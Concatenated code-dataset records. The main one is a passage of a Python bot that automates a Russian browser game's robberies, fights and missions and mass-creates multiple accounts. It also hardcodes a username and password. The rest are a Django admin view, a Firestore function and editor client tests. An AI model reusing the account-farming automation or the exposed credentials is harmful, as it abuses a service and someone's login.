datetime.now(tzAlmaty) \n\t\trobberyDate = datetimeAlmaty.strftime(\"%d.%m.%y %H:%M:%S\")\n\t\tprint('Дата ограбления: ', robberyDate)\n\t\treturn robberyDate\n\n\n\n\tdef getRewards():\n\t\t\n\t\tcopsReward = '{0} - фуражек. '.format(currentVictimRelationsCops)\n\t\tbanditsReward = '{0} - решеток. '.format(currentVictimRelationsBandits)\n\n\t\trewards = '{0} - ящиков. 
'.format(currentVictimBoxes)\n\n\t\tif currentVictimRelationsBandits>0:\n\t\t\trewards = rewards + banditsReward\n\t\t\n\t\tif currentVictimRelationsCops>0:\n\t\t\trewards = rewards + copsReward\n\n\t\tif currentVictimBoxes == 0 and currentVictimRelationsCops == 0 and currentVictimRelationsBandits == 0:\n\t\t\trewards = 'У человека охрана :) '\n\n\t\tprint(rewards)\n\t\treturn rewards\n\n\tdef writeVictimAndRewardToFile(victimName):\n\t\trewards = getRewards()\n\t\trobberyDate = getCurrentTime()\n\t\twith open(\"victimsNames.txt\", \"a\", encoding='utf-8') as file:\n\t\t\tfile.write(victimName + ': ' + rewards + robberyDate+'\\n')\n\n\tdef parseRandomRob():\n\t\trobSoup = getSoup(randomAttackUrl)\n\t\tnotification = getNotificationText(robSoup)\n\t\tif notification:\n\t\t\ttry:\n\t\t\t\tvictimName = notification.split('фраера')[1].split('.')[0].strip()\n\t\t\t\t# victimId, pageCount = getPageCountAndVictimId(robSoup)\n\t\t\t\t\n\t\t\t\t# if victimId !=0 and pageCount != 0:\n\t\t\t\tisHaveResult = getAvailableCrops(robSoup)\n\t\t\t\tif isHaveResult:\n\t\t\t\t\tprint('Похоже мы смогли ограбить что то!')\n\t\t\t\t\treturn 1\n\t\t\t\telse:\n\t\t\t\t\tprint('Мы не ограбили этого.')\n\t\t\t\t\treturn 0\n\t\t\texcept:\n\t\t\t\tcloseNotification()\n\t\t\t\treturn 0\n\t\t\t# else:\n\t\t\t# \t# print('Найдем друого!')\n\t\t\t# \twaitHalfSecond()\n\t\t\t# \treturn 0\n\t\telse:\n\t\t\tcloseNotification()\n\t\t\treturn 0\n\n\tchangeLayoutToDefault()\n\tglobal goodRobsCount\n\tgoodRobsCount = 0\n\twhile goodRobsCount < count:\n\n\t\tstatus = parseRandomRob()\n\t\tif status == 1:\n\t\t\tgoodRobsCount = goodRobsCount + 1\n\t\telse:\n\t\t\tprint('Дальше грабим!')\n\t\t\twaitHalfSecond()\n\tchangeLayoutToLight()\n\treturn\n\t\t\t\n\n\ndef fights(needFightsCount):\n\tglobal currentFightsCount\n\tcurrentFightsCount = 0\n\trivalUrl = url + '/index.php?r=fights/rival'\n\ttoLightUrl = url + '/?r=site/layout&layout=light'\n\ttoHitUrl = url + '/index.php?r=fights/hit&type='\n\tstartFightUrl =url + '/index.php?r=fights/choose&club=official'\n\tisCanToBuyEnergy = False\n\tneedEnemyType = 'all'\n\n\n\tnextFightButtonsLables = ['Следующий!', 'В бой', 'Ещё бой!']\n\n\tenemyTypes = {\n\t\t'strength':'Силач-Дэбил',\n\t\t'critical':'Критач-таутуированный',\n\t\t'dexterity':'Ловкач-Брюс-Ли',\n\t\t'defence':'Защитник-Сумоист',\n\t\t'woman':'Женщина'\n\t}\n\thitTypesLables = {\n\t\t'strength':'силу',\n\t\t'critical':'крит',\n\t\t'dexterity':'ловкость',\n\t}\n\n\thitTypes = ['strength','dexterity', 'critical']\n\n\tdef buyEnergy():\n\t\t# urlToBuyEnergy = url + '/index.php?r=crop/energyRepair'\n\t\t# user.get(urlToBuyEnergy)\n\t\t# print('Закупились энергией')\n\t\t# waitHalfSecond()\n\t\tprint('Нет энергии для боев, ждем 30 сек и продолжим')\n\t\ttime.sleep(30)\n\n\n\tdef replenishEnergy(soup):\n\t\tenergySpan = soup.find('span', attrs={'id': 'z-energy'})\n\t\tif energySpan:\n\t\t\tenergyCount = int(energySpan.get_text().strip().split('/')[0])\n\t\t\tif energyCount < 7 and isCanToBuyEnergy:\n\t\t\t\tbuyEnergy()\n\t\telse:\n\t\t\trefreshIfDummy(soup)\n\n\t\t\t\t\n\n\n\tdef getFightStatus(soup):\n\t\tenemyName = soup.find('div', attrs={'class': 'fight-head-name'})\n\t\tif enemyName:\n\t\t\tprint('Противник: ', enemyName.get_text().strip())\n\t\telse:\n\t\t\treturn 'ended'\n\n\t\tnextFightButton = soup.find('a', attrs={'class': 'bttn_green long mt5'})\n\t\tchangeEnemyButton = soup.find('a', attrs={'class': 'bttn_sea'})\n\t\tif nextFightButton:\n\t\t\tnextFightButtonText = nextFightButton.get_text().strip()\n\t\t\tisEnd = 
nextFightButtonText in nextFightButtonsLables\n\t\t\tif isEnd:\n\t\t\t\tprint('Битва закончилась.')\n\t\t\t\treturn 'ended'\n\t\t\t\n\t\telif changeEnemyButton:\n\t\t\tisEnd = changeEnemyButton.get_text().strip() == 'Сменить противника'\n\t\t\tif isEnd:\n\t\t\t\tprint('Битва закончилась на охране.')\n\t\t\t\treturn 'needToChange'\n\t\t\telse:\n\t\t\t\treturn 'now'\n\t\telse:\n\t\t\treturn 'now'\n\n\tdef parseStats(soup):\n\t\tfightStatsMe = soup.find('div', attrs={'class': 'fight-stats _me'}).findAll('div', attrs={'class': 'fight-stat'})\n\t\tfightStatsEnemy = soup.find('div', attrs={'class': 'fight-stats _enemy'}).findAll('div', attrs={'class': 'fight-stat'})\n\t\tstrength_my = int(fightStatsMe[0].get_text().strip())+5\n\t\tdexterity_my = int(fightStatsMe[1].get_text().strip())+5\n\t\tcritical_my = int(fightStatsMe[2].get_text().strip())\n\n\t\tstrength_enemy = int(fightStatsEnemy[0].get_text().strip())\n\t\tdexterity_enemy = int(fightStatsEnemy[1].get_text().strip())\n\t\tcritical_enemy = int(fightStatsEnemy[2].get_text().strip())\n\t\tprint(' ',strength_my,dexterity_my,critical_my,' ')\n\t\tprint(' ',strength_enemy,dexterity_enemy,critical_enemy,' ')\n\t\tstats = {\n\t\t\t'strength_my':strength_my,\n\t\t\t'dexterity_my':dexterity_my,\n\t\t\t'critical_my':critical_my,\n\t\t\t'strength_enemy':strength_enemy,\n\t\t\t'dexterity_enemy':dexterity_enemy,\n\t\t\t'critical_enemy':critical_enemy\n\t\t}\n\n\t\treturn stats\n\n\n\tdef determineHowToHit(stats):\n\t\tif stats['strength_my'] > stats['strength_enemy']:\n\t\t\tswin = 1\n\t\telse:\n\t\t\tswin = 0\n\t\tif stats['dexterity_my'] > stats['dexterity_enemy']:\n\t\t\tlwin = 3\n\t\telse:\n\t\t\tlwin = 0\n\t\tif stats['critical_my'] > stats['critical_enemy']:\n\t\t\tkwin = 5\n\t\telse:\n\t\t\tkwin = 0\n\t\twcount = swin + lwin + kwin\n\t\t# Высчитываем фактор победы\n\t\tif wcount <= 3:\n\t\t\tprint('lose because wcount ==', wcount)\n\t\t\treturn 'lose'\n\t\t\t#Это поражение\n\t\telif wcount == 5:\n\t\t\treturn 'lose'\n\t\t\t#Это поражение\n\t\telif wcount == 4:\n\t\t\t#Ты сильнее его и ловчее\n\t\t\treturn 'strength-dexterity'\n\t\telif wcount == 6:\n\t\t\t#Ты сильнее и критичнее\n\t\t\treturn 'strength-critical'\n\t\telif wcount == 8:\n\t\t\t#Ты ловчее и критичнее\n\t\t\treturn 'dexterity-critical'\n\t\telif wcount == 9:\n\t\t\treturn 'ALL'\n\n\n\tdef refreshIfDummy(soup):\n\t\tisDummyPage = isDummy(soup)\n\t\tif isDummyPage:\n\t\t\t#time.sleep(2)\n\t\t\tcheckRival(0)\n\t\telse:\n\t\t\tprint('ВНИМАНИЕ, ЧТО ТО НЕ СРАБОТАЛО И ЭТО НЕ ИЗ-ЗА ЗАГЛУШКИ')\n\n\tdef changeEnemy(soup):\n\t\tchangeEnemyButton = soup.find('a', attrs={'class': 'bttn_sea'})\n\t\tif changeEnemyButton:\n\t\t\tchangeUrl = url + changeEnemyButton['href']\n\t\t\tnextStep = getSoup(changeUrl)\n\t\t\tcheckRival(nextStep)\n\t\telse:\n\t\t\trefreshIfDummy(soup)\n\n\tdef newEnemy(soup):\n\t\tglobal currentFightsCount\n\t\tcurrentFightsCount = currentFightsCount + 1 \n\t\tnewEnemyButton = soup.find('a', attrs={'class': 'bttn_green long mt5'})\n\t\tif newEnemyButton:\n\t\t\tchangeUrl = url + newEnemyButton['href']\n\t\t\tnextStep = getSoup(changeUrl)\n\t\t\tcheckRival(nextStep)\n\t\telse:\n\t\t\trefreshIfDummy(soup)\n\n\tdef getTokenToHit(soup):\n\t\thitButton = soup.find('a', attrs={'class': 'square-btn-green'})\n\t\tif hitButton:\n\t\t\ttoken = hitButton['href'].split('&token=')[1]\n\t\t\treturn token\n\t\telse:\n\t\t\trefreshIfDummy(soup)\n\n\n\tdef determineDisabledButton(soup):\n\t\tdisabledButton = soup.find('span', attrs={'class': 'square-btn-gray'})\n\t\tif 
disabledButton:\n\t\t\treturn disabledButton.find('img')['src'].split('hit/')[1].split('.')[0]\n\t\telse:\n\t\t\treturn None\n\n\tdef hitByType(hitType, token):\n\t\thitUrl = toHitUrl + hitType + '&token='+token\n\t\tsoup = getSoup(hitUrl)\n\t\tprint('Ударил использовав: ', hitTypesLables[hitType])\n\t\tcheckRival(soup)\n\n\n\tdef hit(winFactor, token, disabledButton):\n\t\tif winFactor == 'ALL':\n\t\t\tfor hitType in hitTypes:\n\t\t\t\tif hitType != disabledButton:\n\t\t\t\t\thitByType(hitType,token)\n\t\t\t\t\tbreak\n\t\telse:\n\t\t\tcurrentHitTypes = winFactor.split('-')\n\t\t\t# hit only with the stat types we actually beat this enemy on\n\t\t\tfor hitType in currentHitTypes:\n\t\t\t\tif hitType != disabledButton:\n\t\t\t\t\thitByType(hitType,token)\n\t\t\t\t\tbreak\n\n\n\n\t\t\t\n\t\t\t\n\t\t\n\n\tdef continueTheFight(soup):\n\t\tstats = parseStats(soup)\n\t\twinFactor = determineHowToHit(stats)\n\t\tif winFactor == 'lose':\n\t\t\tprint('Сменим противника, потому что он сильнее')\n\t\t\tchangeEnemy(soup)\n\t\telse:\n\t\t\tdisabledButton = determineDisabledButton(soup)\n\t\t\ttoken = getTokenToHit(soup)\n\t\t\tif token:\n\t\t\t\thit(winFactor, token, disabledButton)\n\n\tdef checkRival(soup):\n\t\tglobal currentFightsCount\n\t\tprintWithLevel('Проведено боев: {0}/{1}'.format(currentFightsCount,needFightsCount))\n\t\tif currentFightsCount >= needFightsCount:\n\t\t\treturn 'enough'\n\t\tif soup == 0:\n\t\t\trivalSoup = getSoup(rivalUrl)\n\t\telse:\n\t\t\trivalSoup = soup\n\n\t\tfightStatus = getFightStatus(rivalSoup)\n\t\tenemyType = getEnemyType(rivalSoup)\n\t\treplenishEnergy(rivalSoup)\n\t\tisNeedType = (enemyType == needEnemyType) or (needEnemyType == 'all')\n\t\tif fightStatus == 'now' and isNeedType:\n\t\t\tcontinueTheFight(rivalSoup)\n\t\telif enemyType == 'noEnemy':\n\t\t\tcurrentFightsCount = currentFightsCount + 1 \n\t\t\tsoup = getSoup(startFightUrl)\n\t\t\tcheckRival(soup)\n\t\telif fightStatus == 'ended':\n\t\t\twaitHalfSecond()\n\t\t\tnewEnemy(rivalSoup)\t\n\t\telse:\n\t\t\twaitHalfSecond()\n\t\t\tchangeEnemy(rivalSoup)\n\t\t\t\n\t\t\n\tdef getEnemyType(soup):\n\t\tfightBack = soup.find('div', attrs={'class': 'fight-back'})\n\t\tif fightBack:\n\t\t\tenemyType = fightBack['style'].split('bgs/')[1].split('/')[0]\n\t\t\tprint('Это {0}.'.format(enemyTypes[enemyType]))\n\t\t\treturn enemyType\n\t\telse:\n\t\t\treturn 'noEnemy'\n\n\tdef isDummy(soup):\n\t\trefresh = soup.find('a', attrs={'class': 'btn-a t-c mt5'})\n\t\tif refresh:\n\t\t\tisDummyPage = refresh.get_text().strip() == 'Обновить'\n\t\t\tif isDummyPage:\n\t\t\t\tprint('Харе так бешанно :)')\n\t\t\treturn isDummyPage\n\t\telse:\n\t\t\treturn False\n\twhile True:\n\t\tresult = checkRival(0)\n\t\tif result == 'enough':\n\t\t\tprintWithLevel('Закончили бои, их было: '+str(currentFightsCount))\n\t\t\tcurrentFightsCount = 0\n\t\t\tbreak\n\n\n\ndef waitNextLevel(needLevel):\n\twhile True:\n\t\tcheckLevel()\n\t\tif myLevel >= needLevel:\n\t\t\tprint('Апнули левел на: ', myLevel)\n\t\t\treturn True\n\t\telse:\n\t\t\tharvestAllEachOne()\n\t\t\tgetAwards(2)\n\t\t\t#time.sleep(30)\n\t\t\tpass\n\n\ndef add_params(need_equipments):\n\n\tfor equipment_id in need_equipments:\n\t\tuser.get(url + '/?r=fights/equipments&equipment_id='+equipment_id)\n\t\twaitHalfSecond()\n\tpass\n\n\ndef getAndReturnСhain(itemName):\n\tuser.get(url + '/index.php?r=property/add&id='+itemName)\n\twaitHalfSecond()\n\tchainPage = user.get(url + '/index.php?r=property/list&top=clothes&cat=chain')\n\twaitHalfSecond()\n\ttry:\n\t\tsoup = bs(chainPage.content, 'html.parser')\n\t\tchain_cancel_url = soup.find('a', attrs = 
{'class':'bttn_red'})['href']\n\t\tchain_cancel = user.get(url+chain_cancel_url)\n\t\tchain_cancel = user.get(url+chain_cancel_url)\n\texcept:\n\t\tprint('NO!')\n\tprint('купили и вернули')\n\ndef get_card():\n\ttry:\n\t\tpvp = user.get(url + '/index.php?r=cards/cards')\n\t\tsoup = bs(pvp.content, \"lxml\")\n\t\tinf_one = soup.find_all('a', attrs={'class': 'card'})\n\t\tinf_two = inf_one[0]\n\t\tglobal url_take_card\n\t\turl_take_card = inf_two['href']\n\t\treturn True\n\texcept:\n\t\tprint('Карзино заперто.')\n\t\treturn False\n\n\n\ndef take_card():\n\tprint('Берем карту')\n\tcard = get_card()\n\tif card:\n\t\tcc = str(url+url_take_card)\n\t\tprint(cc)\n\t\ttakecard = user.get(cc)\n\t\tprint('Взяли карту')\n\telse:\n\t\tprint('Нет карты')\n\ndef takefuckingoffice():\n\tharvestAllEachOne()\n\t#time.sleep(5)\n\tuser.get(url + '/?r=estate')\n\tprintWithLevel('Жду 2 секунды в офисе')\n\t#time.sleep(2)\n\tuser.get(url + '/index.php?r=estate/shoplist&slot=0')\n\tprintWithLevel('Жду 2 секунды в офисе')\n\t#time.sleep(2)\n\tuser.get(url + '/index.php?r=estate/shopview&slot=0&type=office')\n\tprintWithLevel('Жду 2 секунды в офисе')\n\t#time.sleep(1)\n\tuser.get(url + '/index.php?r=estate/estatebuy&slot=0&type=office')\n\tprintWithLevel('Жду 2 секунды в офисе')\n\t#time.sleep(2)\n\tuser.get(url + '/index.php?r=estate/estatebuy&slot=3&type=office')\n\tprintWithLevel('Жду 2 секунды в офисе')\n\t#time.sleep(2)\n\tharvestAllEachOne()\n\tpass\n\n\ndef mission2():\n\tcheckLevel()\n\tprintStartMission(2)\n\tgetDotsId()\n\tdots = myDots[2:]\n\tfor id_c in dots:\n\t\tprintWithLevel('Ставим беляшную Гаф-Гаф')\n\t\taddDot('bone_setter',id_c)\n\t\twaitHalfSecond()\n\tprintWithLevel('Нужно подождать 30 сек до созревания точек')\n\ttime.sleep(30)\n\tharvestAllEachOne()\n\tgetAwards(2)\n\twaitHalfSecond()\n\tgetAwards(2)\n\tsetFunnyDescription()\n\ndef mission3():\n\tcheckLevel()\n\tprintStartMission(3)\n\tprintWithLevel('Нужно сделать 4 боя, сбор точек, поставить гаф гаф')\n\tfights(4)\n\tprintWithLevel('Заберем награду за 4 боя.')\n\tgetAwards(2)\n\twaitHalfSecond()\n\tgetAwards(2)\n\tprintWithLevel('Ставим гафгаф')\n\tgetDotsId()\n\tremoveDot(myDots[4])\n\tprintWithLevel('Ставим snack_bar')\n\taddDot('snack_bar',myDots[4])\n\t#time.sleep(1)\n\tprintWithLevel('забираем награду')\n\tgetAwards(2)\n\twaitNextLevel(4)\n\n\ndef mission4():\n\twaitHalfSecond()\n\tcheckLevel()\n\tprintStartMission(4)\n\tupgrade_stats()\n\tuser.get(url + '/index.php?r=fights/equipments&equipment_id=bita')\n\twaitHalfSecond()\n\tprintWithLevel('Бежим за цепурой')\n\tgetAndReturnСhain('first_chain')\n\twaitNextLevel(5)\n\ndef mission5():\n\tcheckLevel()\n\tprintStartMission(5)\n\tprintWithLevel('5 боев, 5 точек и 3 грабежа!')\n\tprintWithLevel('надо попробовать грабануть')\n\trobs(3)\n\tprintWithLevel('Ожидание 30 секунд')\n\ttime.sleep(30)\n\tfights(5)\n\tprintWithLevel('Ожидание 20 секунд')\n\ttime.sleep(20)\n\tprintWithLevel('дальше только точки')\n\twaitNextLevel(6)\n\ndef mission6():\n\twaitHalfSecond()\n\tcheckLevel()\n\tprintStartMission(6)\n\tprintWithLevel('тут нам надо набить авторитету, сходить в гоп-стоп и поставить столовку хавчик')\n\tprintWithLevel('начнем с хавчика')\n\tgetDotsId()\n\tdots = myDots[2:]\n\tidc = 0\n\tfor id_c in dots:\n\t\tidc = idc + 1;\n\t\tif idc == 3:\n\t\t\tprintWithLevel('Сюда ставим!')\n\t\t\tremoveDot(id_c)\n\t\t\taddDot('dining',id_c)\n\t\telse:\n\t\t\tpass\n\tprintWithLevel('что-ж пора улучшить параметры!')\n\tprint('теперь ты непобедим! 
(среди бомжей)')\n\tgetAwards(2)\n\tprintWithLevel('пока пособираем точки где то 200 сек')\n\tfor i in range(8):\n\t\tharvestAllEachOne()\n\t\tprint('ждем 35 сек')\n\t\ttime.sleep(31)\n\tprintWithLevel('и 12 боев надо, шоб наверняка')\n\tfights(12)\n\tprintWithLevel('пошли забирать награду!')\n\tgetAwards(4)\n\t#time.sleep(1)\n\tgetAwards(4)\n\tuser.get(url + '/index.php?r=property/add&id=first_rosary')\n\t#time.sleep(2)\n\twaitNextLevel(7)\n\ndef mission7():\n\twaitHalfSecond()\n\tcheckLevel()\n\tprintStartMission(7)\n\tupgrade_stats()\n\tupgrade_stats()\n\tprintWithLevel('Не больше 5 грабежей')\n\trobs(5)\n\tfor x in range(12):\n\t\tprintWithLevel('Точки соберу')\n\t\tharvestAllEachOne()\n\t\t#time.sleep(10)\n\n\tprintWithLevel('казино, 1 место под точку, 2 подполки, олимпийка, барыга, 5 точек, 7 боев, и все!')\n\tprintWithLevel('сразу начнем с покупки точки!')\n\tuser.get(url + '/index.php?r=crop/addslot&type=slow')\n\twaitHalfSecond()\n\tuser.get(url + '/?r=pusher')\n\tgetAwards(1)\n\tprint('+1 доц за барыгу')\n\ttake_card()\n\tprintWithLevel('забрали финку, надо его надеть.')\n\tuser.get(url + '/index.php?r=property/list&top=clothes&cat=weapon')\n\twaitHalfSecond()\n\tprintWithLevel('5 раз сходим за вещями')\n\tfor i in range(5):\n\t\tuser.get(url + '/index.php?r=property/add&id=sharpening')\n\t\tprintWithLevel('купим олимпийку')\n\t\twaitHalfSecond()\n\t\tuser.get(url + '/index.php?r=property/add&id=sweatshirts')\n\t\tprintWithLevel('забираем награду')\n\tgetAwards(2)\n\twaitHalfSecond()\n\tharvestAllEachOne() #collect all the dots\n\tgetAwards(1)\n\t#time.sleep(5)\n\tgetDotsId()\n\tdots = myDots[2:]\n\tfor id_c in dots:\n\t\tremoveDot(id_c)\n\t\tprintWithLevel('Ставим карточный клуб')\n\t\taddDot('card_club',id_c)\n\twaitHalfSecond()\n\tprintWithLevel('подполки поставил!')\n\tprintWithLevel('бои даже стараться не буду делать, лучше левел апнуть')\n\tgetAwards(2)\n\t#time.sleep(1)\n\tgetAwards(2)\n\twaitNextLevel(8)\n\n\ndef mission8():\n\twaitHalfSecond()\n\tcheckLevel()\n\tprintStartMission(8)\n\tuser.get(url + '/index.php?r=fights/params&param_id=strength')\n\twaitHalfSecond()\n\tuser.get(url + '/index.php?r=fights/params&param_id=critical')\n\twaitHalfSecond()\n\tupgrade_stats()\n\tupgrade_stats()\n\tprintWithLevel('тут офис, 6 точек, 5 боев и 8 грабежей')\n\tfor i in range(5):\n\t\ttakefuckingoffice()\n\tprint('Офис на месте!')\n\tgetAwards(1)\n\tprintWithLevel('8 грабежей не просто сделать, так что тупо буду собирать точки')\n\t#time.sleep(30)\n\tharvestAllEachOne()\n\tgetAwards(1)\n\twaitNextLevel(9)\n\n\n\ndef mission9():\n\twaitHalfSecond()\n\tcheckLevel()\n\tprintStartMission(9)\n\tupgrade_stats()\n\tprintWithLevel('тут у нас: 2 летника, 1 ускорение, сбор с 8 точек и 8 грабежей')\n\tharvestAllEachOne() #collect all the dots\n\tgetAwards(1)\n\tprint('два летника ставим!')\n\tgetDotsId()\n\tdots = myDots[2:4]\n\tfor id_c in dots:\n\t\tremoveDot(id_c)\n\t\tprint('Ставим летники')\n\t\taddDot('outdoor_cafe',id_c)\n\tprintWithLevel('летники поставил!')\n\t#time.sleep(5)\n\tgetAwards(1)\n\tprintWithLevel('надо че нить ускорить!')\n\tgetDotsId()\n\tdots = myDots[2:]\n\tidc = 0\n\tfor id_c in dots:\n\t\tidc = idc + 1\n\t\tif idc == 3:\n\t\t\tprintWithLevel('эту ускорим!')\n\t\t\tboostDot(id_c)\n\t\t\t#time.sleep(0.3)\n\t\telse:\n\t\t\tpass\n\t#time.sleep(2)\n\tharvestAllEachOne()\n\tgetAwards(2)\n\tprintWithLevel('уже должны апнуть 10ку!')\n\twaitNextLevel(10)\n\n\ndef writeToGoodFile(nick):\n\twith open('combinat_result.txt', 'a', encoding=\"utf8\") as 
mf:\n\t\tmf.write(str(nick)+'\\n')\n\tpass\n\ndef misses():\n\tmission2()\n\tmission3()\n\tmission4()\n\tmission5()\n\tmission6()\n\tmission7()\n\tmission8()\n\tmission9()\n\tgotoband()\n\twriteToGoodFile(newMult)\n\n\ndef main():\n\tglobal user\n\tprint('Привет, я создаю быстрых мультов из списка')\n\n\tfor nick in listOfMuls:\n\t\tnewAccount(nick)\n\t\tmisses()\n\t\tprint('Закончили с ', nick)\n\t\ttry:\n\t\t\tuser = requests.Session()\n\t\t\tuser.close()\n\t\texcept:\n\t\t\tpass\n\n\ndef test():\n\tlogin('hg6jytras781','22rafaelka23')\n\trobs(3)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"quintbrut/safe","sub_path":"multcreate.py","file_name":"multcreate.py","file_ext":"py","file_size_in_byte":34273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11462916989","text":"from django.http import HttpRequest, HttpResponse, HttpResponseRedirect\r\nfrom django.shortcuts import render, reverse\r\nfrom mainapp.models import Stuff\r\nfrom adminapp.models.product import ProductEdit\r\n\r\ndef index(request:HttpRequest):\r\n models = Stuff.objects.all()\r\n return render(request,'adminapp/products/index.html', {'models': models})\r\n\r\ndef create(request:HttpRequest):\r\n return HttpResponse('create')\r\n\r\ndef read(request:HttpRequest,id):\r\n stuff = Stuff.objects.get(id=id)\r\n category = stuff.category\r\n return render(request, 'adminapp/products/read.html', {'stuff': stuff,'category':category})\r\n\r\ndef update(request:HttpRequest,id):\r\n title = Stuff.objects.get(pk=id)\r\n if request.method == 'POST':\r\n update_form = ProductEdit(request.POST, instance=title)\r\n if update_form.is_valid():\r\n update_form.save()\r\n return HttpResponseRedirect(reverse('adminapp:products'))\r\n else:\r\n update_form = ProductEdit(instance=title)  # bind the product being edited, not the user\r\n content = {\r\n 'title': title,\r\n 'update_form': update_form,\r\n }\r\n return render(request, 'adminapp/categories/update.html', content)\r\n\r\ndef delete(request:HttpRequest,id):\r\n title = Stuff.objects.get(pk=id)\r\n title.delete()\r\n return HttpResponseRedirect(reverse('adminapp:products'))\r\n\r\ndef list_by_category(request:HttpRequest,category):\r\n return HttpResponse('list')\r\n","repo_name":"kirosx/GB-Django1","sub_path":"adminapp/views/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33013015486","text":"from google.cloud import firestore\nfrom flask import jsonify\n\ndef feedbackSummation(requests):\n collection_name = 'UserFeedback'\n \n headers = {\n 'Access-Control-Allow-Methods': 'POST',\n 'Access-Control-Allow-Origin': '*'\n }\n feedback_response = getFireStoreData(collection_name)\n \n return (jsonify(feedback_response),200,headers)\n\n\ndef getFireStoreData(collection_name):\n \n db = firestore.Client()\n user_feedbacks = db.collection(collection_name).stream()\n total_records = 0\n polarity_score = 0\n for feedback in user_feedbacks:\n total_records = total_records + 1\n database_feedback_dict = feedback.to_dict()\n polarity_score = polarity_score + database_feedback_dict['polarity_score']\n # average the accumulated polarity, guarding against an empty collection\n positive_feedback_percentage = (polarity_score / total_records) * 100 if total_records else 0\n return {\"positive_feedback\": positive_feedback_percentage}","repo_name":"AbhishekPethani/CSCI_5410_Serverless_Data_Processing","sub_path":"backend/machine_learning/Feedback 
Analysis/Feedback_Summarized_Analysis.py","file_name":"Feedback_Summarized_Analysis.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28609496162","text":"# basic functionality tests for client side\n\nimport os\nimport sys\nfrom unittest import TestCase\nimport subprocess\nimport time\nfrom Queue import Empty\n\nsys.path.insert(0, os.path.abspath('../src/'))\n\nfrom sessions.client.main import *\n\n\"\"\"@type subproc: subprocess\"\"\"\nsubproc = None\n\nlogging.disable(logging.CRITICAL)\n\n\n# Helper class for creating args similar as given to main class\nclass Bunch:\n def __init__(self, **kwds):\n self.__dict__.update(kwds)\n\n\nclass ClientTests(TestCase):\n\n def setUp(self):\n #Setting up args\n args = Bunch(port=DEFAULT_SERVER_PORT, listenport=DEFAULT_SERVER_PORT, host=DEFAULT_SERVER_INET_ADDR)\n\n # Start server as subprocess\n global subproc\n subproc = subprocess.Popen([\"python\", \"../src/editor_server.py\"], shell=False)\n # client server variable set up\n initialize(args)\n\n\n # Test file creating, new file, file with same name\n def test_file_creating(self):\n # Creating new file\n status = create_file('user1', 'file1')\n self.assertEqual(status, \"\") # Should only return empty err\n # Create file that already exists.\n status = create_file('user1', 'file1')\n self.assertEqual(status, \"File file1 already exists\") # Should return given error\n\n\n # Test file opening, whether such file exists, accessing unauthorized file\n def test_file_opening(self):\n create_file('user1', 'file1')\n # Normal file opening\n status, _, _ = open_file('user1', 'file1')\n self.assertEqual(status, \"\") # Meaning no error\n # Unauthorized file opening\n status, _, _ = open_file('user2', 'file1')\n self.assertEqual(status, \"Don't have rights to access file1\")\n # Opening non-existing file\n status, _, _ = open_file('user1', 'file2')\n self.assertEqual(status, \"This file does not exsist.\")\n\n # Stop edits listening thread properly\n stop_listening()\n\n\n # Test editor (user) adding - adding twice, add owner as editor\n def test_editor_adding(self):\n create_file('user1', 'file1')\n #Add editor (user) normally)\n status = add_editor('user1', 'file1', 'user2')\n self.assertEqual(status, \"\")\n #Add same editor twice\n status = add_editor('user1', 'file1', 'user2') # Throws no error\n self.assertEqual(status, \"\")\n #Add owner as editor (user)\n status = add_editor('user1', 'file1', 'user1') # TODO one can add himself as user\n #self.assertEqual(status, \"Cannot add owner as user\")\n #Add editor to available file (file that user does not own)\n status = add_editor('user2', 'file1', 'user3')\n self.assertEqual(status, \"Must be owner to change editors\")\n\n\n # Editor deleting - delete owner, delete editor twice\n def test_editor_removing(self):\n create_file('user1', 'file1')\n add_editor('user1', 'file1', 'user2')\n # Remove editor normally\n status = remove_editor('user1', 'file1', 'user2')\n self.assertEqual(status, \"\")\n # Remove editor second time\n status = remove_editor('user1', 'file1', 'user2') # No error thrown\n self.assertEqual(status, \"\")\n # Try to remove owner non-existing user from editors\n status = remove_editor('user1', 'file1', 'nonexist') # No error thrown\n self.assertEqual(status, \"\")\n # Try to remove user for available file (file that user does not own\n status = remove_editor('user2', 'file1', 'user1')\n self.assertEqual(status, \"Must be owner to 
change editors\")\n\n # Test file listing for different scenarios\n def test_file_listing(self):\n create_file('user1', 'file1')\n create_file('user1', 'file2')\n create_file('user2', 'file3')\n add_editor('user2', 'file3', 'user1')\n #List files for user1\n status, owned, available = get_files('user1')\n self.assertEqual(status, \"\")\n self.assertItemsEqual(owned, ['file1', 'file2'])\n self.assertItemsEqual(available, ['file3'])\n #List files for user2\n status, owned, available = get_files('user2')\n self.assertEqual(status, \"\")\n self.assertItemsEqual(owned, ['file3'])\n self.assertItemsEqual(available, [])\n #List files for new user\n status, owned, available = get_files('newuser')\n self.assertEqual(status, \"\")\n self.assertItemsEqual(owned, [])\n self.assertItemsEqual(available, [])\n\n # Test locking rows\n def test_locks(self):\n status = create_file('user1', 'file1')\n status = add_editor('user1', 'file1', 'user2')\n\n #Normal locking\n status, lock = lock_line('user1', 'file1', 1)\n self.assertEqual(status, \"\")\n self.assertTrue(lock)\n #Lock same row twice\n status, lock = lock_line('user1', 'file1', 1)\n self.assertEqual(status, \"\")\n self.assertTrue(lock)\n # Try to lock line, which is already locked\n status, lock = lock_line('user2', 'file1', 1)\n self.assertFalse(lock)\n #Try to lock line of non-existing file\n status, lock = lock_line('user1', 'non_exist', 1)\n self.assertEqual(status, \"This file does not exsist.\")\n #Try to lock line of non-existing line\n status, lock = lock_line('user1', 'file1', 5)\n self.assertEqual(status, \"\")\n self.assertTrue(lock)\n #Try to lock line of not available file\n status, lock = lock_line('user3', 'file1', 1)\n self.assertEqual(status, \"Don't have rights to access file1\")\n #Check if previously locked line is released and new line locked\n status, lock = lock_line('user1', 'file1', 2)\n self.assertTrue(lock)\n status, lock = lock_line('user2', 'file1', 1)\n self.assertTrue(lock)\n\n # Test editor (user) listing\n def test_get_editors(self):\n status = create_file('user1', 'file1')\n add_editor('user1', 'file1', 'user2')\n add_editor('user1', 'file1', 'user3')\n #Get editors normally\n status, editors = get_editors('user1', 'file1')\n self.assertEqual(status, \"\")\n self.assertItemsEqual(editors, ['user2', 'user3'])\n 